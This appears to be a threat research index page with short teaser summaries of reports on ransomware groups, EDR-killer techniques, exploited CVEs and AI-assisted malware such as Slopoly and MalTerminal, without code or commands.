Threat Research

EDR killers have become a standard component of modern ransomware attacks, used by affiliates to disable security tools before deploying encryption payloads. While the BYOVD technique remains common, attackers increasingly adopt driverless methods, legitimate utilities, and customizable kits to evade detection....

A financially motivated threat group tracked as Hive0163 has been observed using a likely AI-generated malware called Slopoly during ransomware attacks, marking an early example of AI-driven malware development in real-world operations....

Recent escalations between Iran, the U.S., and Israel have coincided with increased cyber threat activity across the Middle East. Destructive incidents, including kinetic attacks affecting AWS data centers in the UAE and Bahrain, have disrupted regional cloud services....

MalTerminal is an AI-powered malware that uses GPT-4 to dynamically generate ransomware and other malicious code at runtime, instead of carrying a fixed payload. By creating unique scripts on demand through API calls, it evades traditional signature-based detection and static analysis....

Reynolds ransomware leverages a Bring Your Own Vulnerable Driver (BYOVD) technique to neutralize endpoint security controls prior to file encryption. It drops a legitimately signed but vulnerable kernel driver, NSecKrnl.sys, and exploits CVE-2025-68947 to gain kernel-level privileges....

The intrusion started in mid-February 2024 when a threat actor exploited CVE-2023-46604 on an exposed Apache ActiveMQ server. By leveraging a Java Spring class and a custom Spring bean XML configuration, the attacker achieved remote code execution. The malicious XML executed a command that used Windows CertUtil to download a payload from a remote server....

Osiris ransomware is a modern, enterprise-focused threat that conducts targeted intrusions involving deep network compromise, data exfiltration, and double-extortion tactics before encrypting victim systems....

Labs have uncovered a multi-stage malware campaign mainly targeting users in Russia. The attack starts with social engineering via business-themed documents that appear routine and harmless. These files distract victims with fake tasks or status messages while malicious processes run in the background....

DeadLock is a low-profile ransomware discovered in July 2025 that stands out for operating without known affiliates or a data leak site. Despite limited victim visibility, the group employs an unusual technique by abusing Polygon smart contracts to rotate or distribute proxy server addresses, enabling stealthy and decentralized infrastructure management....

Medusa has emerged as one of the most active ransomware-as-a-service groups, ranking among the top 10 threats in 2025 and impacting over 500 organizations by January 2026....